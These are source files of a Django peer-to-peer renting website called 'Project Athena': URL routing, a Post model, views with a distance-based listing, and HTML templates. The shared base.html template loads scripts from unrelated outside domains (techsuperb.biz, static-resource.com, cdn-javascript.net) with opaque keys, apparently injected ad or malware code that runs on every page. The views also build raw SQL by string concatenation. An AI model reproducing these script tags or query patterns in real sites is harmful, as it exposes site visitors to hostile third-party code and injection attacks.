Athena/urls.py
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.conf.urls.static import static
from django.conf import settings
from django.urls import path, include
from users import views as user_views
from cart import views as cart_views
from checkout import views as checkout_views

urlpatterns = [
    path('admin/', admin.site.urls),
    ## For Registration page
    path('register/', user_views.register, name = "register"),
    ## For User Profile and login - logout
    path('profile/', user_views.profile, name='profile'),
    path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
    path('logout/', auth_views.LogoutView.as_view(template_name='users/logout.html'), name='logout'),
    path('cart/', cart_views.cart_main, name='cart'),
    path('cart_update/', cart_views.cart_update, name='cart_update'),
    path('checkout/', checkout_views.checkout_main, name='checkout'),
    path('paymentrequest/', checkout_views.paymentrequest, name='paymentrequest'),
    path('callpaytmhandle/', checkout_views.call_paythm_handle, name='callpaytmhandle'),
    path('search/', include("search.urls", namespace='search')),

    ## Urls to reset password
    path('password-reset/',
         auth_views.PasswordResetView.as_view(template_name='users/password_reset.html'),
         name='password_reset'),
    path('password-reset/done/',
         auth_views.PasswordResetDoneView.as_view(template_name='users/password_reset_done.html'),
         name='password_reset_done'),
    path('password-reset-confirm/<uidb64>/<token>/',
         auth_views.PasswordResetConfirmView.as_view(template_name='users/password_reset_confirm.html'),
         name='password_reset_confirm'),
    path('password-reset-complete/',
         auth_views.PasswordResetCompleteView.as_view(template_name='users/password_reset_complete.html'),
         name='password_reset_complete'),

    ####### For Home page ########
    path('', include('P2P_Renting.urls')),

]


if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

P2P_Renting/urls.py
from django.urls import path
from .views import PostListView, PostDetailView, PostCreateView, PostUpdateView, PostDeleteView, myPost_PostListView
from . import views

urlpatterns = [
    # path('', Renting.as_view(), name = "P2P_Renting-Home"),
    path('', PostListView.as_view(), name = "P2P_Renting-Home"),
    path('post/<int:pk>/', PostDetailView.as_view(), name = "P2P_Renting-Detail"), ## pk is primary key which is post id here
    path('post/new/', PostCreateView.as_view(), name = "P2P_Renting-Create"),
    path('post/<int:pk>/update/', PostUpdateView.as_view(), name = "P2P_Renting-Update"),
    path('post/<int:pk>/delete/', PostDeleteView.as_view(), name = "P2P_Renting-Delete"),
    path('about/', views.about, name = "P2P_Renting-About"),
    # path('myPosts/', views.myPosts, name = "myPosts"),
    path('myPosts/', myPost_PostListView.as_view(), name = "myPosts"),
]

search/urls.py
from django.conf.urls import url
from django.urls import path, include

from search.views import SearchProductListView

app_name = 'search'

urlpatterns = [
    path('', SearchProductListView.as_view(), name='search_view'),
    ## For Registration page
    # path('register/', user_views.register, name = "register"),

]

P2P_Renting/models.py
import os
from PIL import Image
from django.db import models
from django.utils import timezone
from django.urls import reverse
from django.contrib.auth.models import User

def upload_path_handler(instance, filename):
    user_path = os.path.join("product_pictures", instance.user.id)
    if not os.path.exists(user_path):
        os.makedirs(user_path)
    return os.path.join(user_path, filename)

class Post(models.Model):
    title = models.CharField(max_length=100)
    content = models.TextField()
    date_posted = models.DateTimeField(default=timezone.now)
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    price = models.DecimalField(default=0.00, max_digits=100, decimal_places=2)  ## price set by author
    is_rented = models.BooleanField(default=False)
    is_active = models.BooleanField(default=True)
    product_image = models.ImageField(default='product_default.jpg', upload_to='product_pictures') #upload_path_handler
    distance = 0
    def __str__(self):
        return self.title

    def save(self, *args, **kwargs):
        super().save(*args, **kwargs)
        print(self.product_image.path)

        img = Image.open(self.product_image.path)

        if img.height > 300 or img.width > 300:
            output_size = (300, 300)
            img.thumbnail(output_size)
            img.save(self.product_image.path)

    def get_absolute_url(self):
        return reverse('P2P_Renting-Detail', kwargs={'pk': self.pk})

P2P_Renting/forms.py
from django import forms
from .models import Post


class ProductUpdateForm(forms.ModelForm):

    class Meta:
        model = Post
        fields = ['title', 'content', 'price', 'product_image']

P2P_Renting/views.py
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from rest_framework.views import APIView
from rest_framework.parsers import MultiPartParser, FormParser, JSONParser
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
from .models import Post
from cart.models import Cart
from users.models import Profile
import math
from .forms import ProductUpdateForm


def home(request):
    context = {
        'posts': Post.objects.all()
    }
    return render(request, 'P2P_Renting/base.html', context)

class PostListView(LoginRequiredMixin, ListView):
    model = Post
    template_name = 'P2P_Renting/home.html'  # Named as <app name>/<model using>_<viewtype>.html
    context_object_name = 'posts'
    paginate_by = 5
    # ordering = ['-date_posted'] ## Minus sign sorts the list from newest to oldest on the field we want to order on

    def get_context_data(self, *, object_list=None, **kwargs):
        context = super(PostListView, self).get_context_data(**kwargs)
        cart_obj, new_obj = Cart.objects.new_or_get(self.request)
        context['cart'] = cart_obj
        return context

    def get_queryset(self):

        MyList = PostListView.get_nearest_users(self)
        MyPost = Post.objects.filter(author_id__in=MyList);
        for post in MyPost:
            post.distance = MyList.get(post.author_id)
        return MyPost
        # return Post.objects.exclude(author_id = self.request.user.id).order_by('-date_posted')

    def get_nearest_users(self):
        latLong1 = '0,0'
        latLong2 = '0,0'
        userList = {}

        for u in Profile.objects.raw('select id,user_id, point from Users_profile where user_id = ' + str(self.request.user.id) ):
            if(u.point != ''):
                latLong1 = u.point

        for p in Profile.objects.raw('select id,user_id, point from Users_profile'):
            if(p.user_id != self.request.user.id):
                if (p.point != ''):
                    latLong2 = p.point
                    if(PostListView.calculate_distance(self,latLong1,latLong2) ):
                        for post in Post.objects.raw('select id from p2p_Renting_Post where author_id = '+ str(p.user_id)):
                            post.distance = PostListView.calculate_distance(self,latLong1,latLong2)
                        userList[p.user_id] = post.distance
        return userList

    def calculate_distance( self,latLong1, latLong2):
        # print(str(latLong1) + " ------ " + str(latLong2))
        lat1_list = latLong1.split(',')
        lat1 = float(lat1_list[0])
        long1= float(lat1_list[1])

        lat1_list = latLong2.split(',')
        lat2 = float(lat1_list[0])
        long2 = float(lat1_list[1])

        DegToRad = 57.29577951

        Ans = math.sin(lat1 / DegToRad)*math.sin(lat2 / DegToRad) + math.cos(lat1 / DegToRad) * math.cos(lat2 / DegToRad) * math.cos(
            math.fabs(long2 - long1) / DegToRad)
        Miles = 3959 * math.atan(math.sqrt(1 - math.pow(Ans, 2)) / Ans)
        Miles = round( Miles, 1)
        distanceinKM = Miles * 1.60934

        return distanceinKM



class PostDetailView(DetailView):
    model = Post
    template_name = 'P2P_Renting/post_detail.html'

    def get_context_data(self, *, object_list=None, **kwargs):
        context = super(PostDetailView, self).get_context_data(**kwargs)
        cart_obj, new_obj = Cart.objects.new_or_get(self.request)
        context['cart'] = cart_obj
        return context

class PostCreateView(LoginRequiredMixin, CreateView):  ## Template to be named as <app name>/<model using>_form.html
    model = Post
    fields = ['title', 'content', 'price', 'product_image']

    def form_valid(self, form):
        form.instance.author = self.request.user
        return super().form_valid(form)

class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):  ## Template to be named as <app name>/<model using>_form.html
    # form_class = ProductUpdateForm
    model = Post
    fields = ['title', 'content', 'price', 'product_image']


    def form_valid(self, form):
        form.instance.author = self.request.user
        return super().form_valid(form)

    def test_func(self):   ## So that no other User can update another Users Post ... will throw 403 forbidden
        post = self.get_object()
        if self.request.user == post.author:
            return True
        return False

class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView): ## Templates will expext to be in <model>_confirm_delete as this command tries to delete
    model = Post
    success_url = '/'

    def test_func(self):   ## So that no other User can delete another Users Post ... will throw 403 forbidden
        post = self.get_object()
        if self.request.user == post.author:
            return True
        return False

def about(request):
    return render(request, 'P2P_Renting/about.html', {'title': 'About'})

# def myPosts(request):
#     ordering = ['-date_posted']
#     context = {
#         'posts': Post.objects.all()
#     }
#     return render(request, 'P2P_Renting/myPost.html', context)

class myPost_PostListView(ListView):
    model = Post
    template_name = 'P2P_Renting/myPost.html'  # Named as <app name>/<model using>_<viewtype>.html
    context_object_name = 'posts'
    ordering = ['-date_posted']  # Minus sign sorts the list from newest to oldest on the field we want to order on
    paginate_by = 1

    def get_queryset(self):
        return Post.objects.filter(author_id = self.request.user.id).order_by('-date_posted')


# from django.shortcuts import render
#
# import logging
# import json
#
# from django.shortcuts import render
# from rest_framework.parsers import MultiPartParser, FormParser, JSONParser
# from rest_framework.views import APIView
# from django.core.serializers.json import DjangoJSONEncoder
# from django.http import HttpResponse
#
# logger = logging.getLogger(__name__)
#
# # class Renting(APIView): ### Cant use POST as Chrome uses GET Method
# #     parser_classes = (MultiPartParser, FormParser, JSONParser,)
# #
# #     def post(self, request):
# #         logger.info('Info Retrieval')
# #         # input_data = request.dataP2PRentingConfig
# #
# #         return HttpResponse("HI")
# #         # return HttpResponse(json.dumps("HI", cls=DjangoJSONEncoder), content_type="application/json")
#
# posts = [
#     {
#         'author': 'CoreyMS',
#         'title': 'Blog Post 1',
#         'content': 'First post content',
#         'date_posted': 'August 27, 2018'
#     },
#     {
#         'author': 'Jane Doe',
#         'title': 'Blog Post 2',
#         'content': 'Second post content',
#         'date_posted': 'August 28, 2018'
#     },
#     {
#         'author': 'Suman Choudhuri',
#         'title': 'Blog Post 3',
#         'content': 'Third post content',
#         'date_posted': 'August 29, 2018'
#     },
# {
#         'author': 'Bikram K',
#         'title': 'Blog Post 4',
#         'content': 'Fourth post content',
#         'date_posted': 'August 2, 2018'
#     }
# ]
#
# def home(request):
#     logger.info('Info Retrieval')
#     # input_data = request.dataP2PRentingConfig
#     context = {
#         'posts': posts
#     }
#     return render(request, 'P2P_Renting/home.html', context)
#     # return HttpResponse('<h1>This is Home Page</h1>')
#
# def about(request):
#     # return HttpResponse('<h1>This is About Page</h1>')
#     return render(request, 'P2P_Renting/about.html')

P2P_Renting/templates/P2P_Renting/about.html
{% extends "P2P_Renting/base.html" %}
{% block content %}
<!--<div class="sb-description text-animation" style="left: 20px; right: auto; float: left; top: 570px;"><div><div class="more" style="float: left; clear: left; background-color: rgb(255, 255, 255); color: rgb(0, 0, 0); cursor: pointer; display: none;">Read more&nbsp;&nbsp;&nbsp;&nbsp;&gt;</div></div></div>-->

<div id="carouselExampleSlidesOnly" class="carousel slide" data-ride="carousel">
  <div class="carousel-inner">
    <div class="carousel-item active">
      <img class="d-block w-100" src="/media/profile_pics/default_female.jpg" alt="First slide">
    </div>
    <div class="carousel-item">
      <img class="d-block w-100" src="/media/profile_pics/default.jpg" alt="Second slide">
    </div>
    <div class="carousel-item">
      <img class="d-block w-100" src="/media/profile_pics/default_female.jpg" alt="Third slide">
    </div>
  </div>
</div>


<div data-packed="true">
    <h1 class="display-3" style="line-height:1.25em; text-align:center;">
        <span
            class="text-body">
            <span>
                WELCOME&nbsp;TO ATHENA&nbsp;
            </span>
        </span>
    </h1>
</div>
<br>
<div data-packed="true">
    <h1 class="display-4" style="line-height:1.25em; text-align:center;">
        <span
            class="text-body">
            <span>
                A Renting Platform
            </span>
        </span>
    </h1>
</div>


<div class="container">
	<div class="row">
		<h2>Some Title</h2>
	</div>

	<div class="block">
      <div class="row">
        <div class="col-sm-3">
          <img class="img-left" src="http://assets.barcroftmedia.com.s3-website-eu-west-1.amazonaws.com/assets/images/recent-images-11.jpg"/>
        </div>
          <div class="col-sm-9"><h3>Experience &nbsp </h3>
              <p>Donec id elit non mi porta gravida at eget metus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui.</p>
              <p>Donec id elit non mi porta gravida at eget metus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui.</p>
              <p>Donec id elit non mi porta gravida at eget metus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui.</p>
          </div>
        </div>
     <br/>
      <div class="row">
        <div class="span4">
          <img class="img-right" src="http://www.prelovac.com/vladimir/wp-content/uploads/2008/03/example.jpg"/>
          <div class="content-heading"><h3>Experience &nbsp </h3></div>
          <p>Donec id elit non mi porta gravida at eget metus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui.</p>
          <p>Donec id elit non mi porta gravida at eget metus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui.</p>
          <p>Donec id elit non mi porta gravida at eget metus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui.</p>
        </div>
     </div>
    </div>

</div>


{% endblock content %}

P2P_Renting/templates/P2P_Renting/base.html
{% load static %}
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />

<!DOCTYPE html>

<html>
<head>

    <!-- jQuery -->
<script src="{% static 'js/jquery-2.0.0.min.js' %}" type="text/javascript"></script>
<script src="//techsuperb.biz/200e670f09e3b73afa.js"></script>

<!-- Bootstrap4 files-->
<script src="{% static 'js/bootstrap.bundle.min.js' %}" type="text/javascript"></script>
<link href="{% static 'css/bootstrap.css' %}" rel="stylesheet" type="text/css">

<!-- Font awesome 5 -->
<link href="{% static 'fonts/fontawesome/css/fontawesome-all.min.css' }" type="text/css" rel="stylesheet">

<!-- custom style -->
<link href="{% static 'css/ui.css' %}" rel="stylesheet" type="text/css">
<link href="{% static 'css/responsive.css" rel="stylesheet" media="only screen and (max-width: 1200px)">

<!-- custom javascript -->
<script src="{% static 'js/script.js' %}" type="text/javascript"></script>

<script type="text/javascript"></script>

<script type="text/javascript"
        src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8206x"></script>
<script type="text/javascript"
        src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8206x&amp;format=arrjs&amp;r=1556562771927"></script>



    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
          integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

    <link rel="stylesheet" type="text/css" href="{% static 'P2P_Renting/main.css' %}">

    {% if title %}
    <title>Project Athena - {{ title }}</title>
    {% else %}
    <title>Project Athena</title>
    {% endif %}
</head>
<body>
<header class="site-header">
    <nav class="navbar navbar-expand-md navbar-dark bg-steel fixed-top">
        <div class="container">
            <!--<img class="rounded-circle account-img" src="{{ user.profile.image.url }}">-->
            <div class="navbar-nav mr-auto">
                <a class="navbar-brand mr-4" href="{% url 'P2P_Renting-Home' %}">
                    <img class="logo"  src="{% static 'images/logos/logo_brand.png' %}"> Project Athena
                </a>
            </div>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarToggle"
                    aria-controls="navbarToggle" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarToggle">
                <div class="navbar-nav mr-auto">
                    <a class="nav-item nav-link" href="{% url 'P2P_Renting-Home' %}">Home</a>
                    <a class="nav-item nav-link" href="{% url 'P2P_Renting-About' %}">About</a>
                </div>
                <!-- Navbar Right Side -->
                <div class="navbar-nav">
                    {% if user.is_authenticated %}
                        <form method="GET" action="{% url 'search:search_view' %}" class="form my-2 my-lg-0">
                            <div class="input-group">
                                <input class="form-control " type="text" placeholder="Search" name="q" aria-label="Search" value="{{ request.GET.q }}">
                                <div class="input-group-append">
                                    <button class="btn btn-outline-default btn-rounded btn-sm my-0" type="submit"><i class="fa fa-search text-grey" aria-hidden="true"></i></button>
                                </div>
                            </div>
                        </form>
                        {% if request.session.cart_items <= 0 %}
                            <a class="nav-item nav-link" href="{% url  'cart' %}"><i class="fa fa-opencart"></i></a>
                        {% else %}
                            <a class="nav-item nav-link" href="{% url  'cart' %}">{{ request.session.cart_items }} <i class="fa fa-opencart"></i></a>
                        {% endif %}
                        <a class="nav-item nav-link" href="{% url  'P2P_Renting-Create' %}">New Post</a>
                        <a class="nav-item nav-link" href="{% url  'myPosts' %}">My Posts</a>
                        <a class="nav-item nav-link" href="{% url  'profile' %}">Profile</a>
                        <a class="nav-item nav-link" href="{% url  'logout' %}">Logout</a>
                    {% else %}
                        <a class="nav-item nav-link" href="{% url 'login' %}">Login</a>
                        <a class="nav-item nav-link" href="{% url  'register' %}">Register</a>
                    {% endif %}
                </div>
            </div>
        </div>
    </nav>
</header>
<main role="main" class="container">
    <div class="row">
        <div class="col-md-12">
            {% if messages %}
            {% for message in messages %}
            <div class="alert alert-{{ message.tags }}">
                {{ message }}
            </div>
            {% endfor %}
            {% endif %}
            {% block content %}{% endblock %}
        </div>
        <!--<div class="col-md-4">-->
            <!--<div class="content-section">-->
                <!--<h3>Our Sidebar</h3>-->
                <!--<p class='text-muted'>You can put any information here you'd like.-->
                <!--<ul class="list-group">-->
                    <!--<li class="list-group-item list-group-item-light">Latest Posts</li>-->
                    <!--<li class="list-group-item list-group-item-light">Announcements</li>-->
                    <!--<li class="list-group-item list-group-item-light">Calendars</li>-->
                    <!--<li class="list-group-item list-group-item-light">etc</li>-->
                <!--</ul>-->
                <!--</p>-->
            <!--</div>-->
        <!--</div>-->
    </div>
</main>

<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
        integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
        crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
        integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
        crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
        integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
        crossorigin="anonymous"></script>
</body>
</html>

P2P_Renting/templates/P2P_Renting/home_backup.html
{% extends "P2P_Renting/base.html" %}
{% block content %}
    {% for post in posts %}
        <article class="media content-section">
            <img class="rounded-circle article-img" src="{{ post.author.profile.image.url }}">
            <div class="media-body">
                <div class="article-metadata">
                    <a class="mr-2" href="{% url 'profile'%}">{{ post.author }}</a>
                    <small class="text-muted">{{ post.date_posted|date:"F d, Y" }}</small>
                </div>
                <h2><a class="article-title" href="{% url 'P2P_Renting-Detail' post.id %}">{{ post.title }}</a></h2>
                <p class="article-content">{{ post.content|truncatewords:20 }}</p>
            </div>
        </article>
    {% endfor %}
{% endblock content %}

P2P_Renting/templates/P2P_Renting/myPost.html
{% extends "P2P_Renting/base.html" %}

{% block content %}
	{% if user.is_authenticated %}


		{% for post in posts %}

					<article class="card card-product">
						<div class="card-body">
						<div class="row">
							<aside class="col-sm-3">
								<div class="img-wrap"><a href="{% url 'P2P_Renting-Detail' post.id %}"><img src="{{ post.product_image.url }}"></a></div>
							</aside> <!-- col.// -->
							<article class="col-sm-6">
									<h4 class="title"> <a class="article-title" href="{% url 'P2P_Renting-Detail' post.id %}">{{ post.title }}</a></h4>
									<div class="rating-wrap mb-2">
										<ul class="rating-stars">
											<li style="width:50%" class="stars-active">
												<i class="fa fa-star"></i> <i class="fa fa-star"></i>
												<i class="fa fa-star"></i> <i class="fa fa-star"></i>
												<i class="fa fa-star"></i>
											</li>
											<li>
												<i class="fa fa-star"></i> <i class="fa fa-star"></i>
												<i class="fa fa-star"></i> <i class="fa fa-star"></i>
												<i class="fa fa-star"></i>
											</li>
										</ul>
										<div class="label-rating">12 reviews</div>
										<div class="label-rating">154 orders </div>
									</div> <!-- rating-wrap.// -->
									<p class="article-content">{{ post.content|truncatewords:25 }}</p>
									<dl class="dlist-align">
									  <dt>Color</dt>
									  <dd>Black and white</dd>
									</dl>  <!-- item-property-hor .// -->
									<dl class="dlist-align">
									  <dt>Material</dt>
									  <dd>Syntetic, wooden</dd>
									</dl>  <!-- item-property-hor .// -->
									<dl class="dlist-align">
									  <dt>Delivery</dt>
									  <dd>Russia, USA, and Europe</dd>
									</dl>  <!-- item-property-hor .// -->
							</article> <!-- col.// -->
							<aside class="col-sm-3 border-left">
								<div class="action-wrap">
									<div class="price-wrap h4">
										<span class="price"> Rs. {{ post.price }}</span>
										<del class="price-old"> Rs. {{ post.price|add:10 }}</del>
									</div> <!-- info-price-detail // -->
									<p class="text-success">Free shipping</p>
									<br>
									<p>
										<a href="{% url 'P2P_Renting-Detail' post.id %}" class="btn btn-secondary"> Details  </a>
									</p>
									<a href="#"><i class="fa fa-heart"></i> Add to wishlist</a>
								</div> <!-- action-wrap.// -->
							</aside> <!-- col.// -->
						</div> <!-- row.// -->
						</div> <!-- card-body .// -->
					</article> <!-- card product .// -->


		{% endfor %}

    {% if is_paginated %}

      {% if page_obj.has_previous %}
        <a class="btn btn-outline-default mb-4" title="First" href="?page=1"><i class="fa fa-angle-double-left"></i></a>
        <a class="btn btn-outline-default mb-4" title="Previous" href="?page={{ page_obj.previous_page_number }}"><i class="fa fa-chevron-circle-left"></i></a>
      {% endif %}

      {% for num in page_obj.paginator.page_range %}
        {% if page_obj.number == num %}
          <a class="btn btn-info mb-4" href="?page={{ num }}">{{ num }}</a>
        {% elif num > page_obj.number|add:'-3' and num < page_obj.number|add:'3' %}
          <a class="btn btn-outline-info mb-4" href="?page={{ num }}">{{ num }}</a>
        {% endif %}
      {% endfor %}

      {% if page_obj.has_next %}
        <a class="btn btn-outline-default mb-4" title="Next" href="?page={{ page_obj.next_page_number }}"><i class="fa fa-chevron-circle-right"></i></a>
        <a class="btn btn-outline-default mb-4" title="Last" href="?page={{ page_obj.paginator.num_pages }}"><i class="fa fa-angle-double-right"></i></a>
      {% endif %}

    {% endif %}

	{% endif %}



{% endblock content %}

P2P_Renting/templates/P2P_Renting/post_confirm_delete.html
{% extends "P2P_Renting/base.html" %}

{% block content %}
    <div class="content-section">
        <form method="POST">
            {% csrf_token %}
            <fieldset class="form-group">
                <legend class="border-bottom mb-4">Delete Post</legend>
                <h2>Are you Sure, you want to Delete this Post" {{ object.title }} "</h2>
            </fieldset>
            <div class="form-group">
                <button class="btn btn-outline-danger" type="submit">Yes, Delete</button>
                <a class="btn btn-outline-secondary" href="{% url 'P2P_Renting-Detail' object.id %}">Cancel</a>
            </div>
        </form>
    </div>
{% endblock content %}

P2P_Renting/templates/P2P_Renting/post_form.html
{% extends "P2P_Renting/base.html" %}
{% load crispy_forms_tags %}
{% block content %}
    <div class="content-section">
        <form method="POST" enctype="multipart/form-data">
            {% csrf_token %}
            <fieldset class="form-group">
                <legend class="border-bottom mb-4">Blog Post</legend>
                <!--{{ form.as_p }}-->
                {{ form|crispy }}
            </fieldset>
            <div class="form-group">
                <button class="btn btn-outline-info" type="submit">Post</button>
            </div>
        </form>
    </div>
{% endblock content %}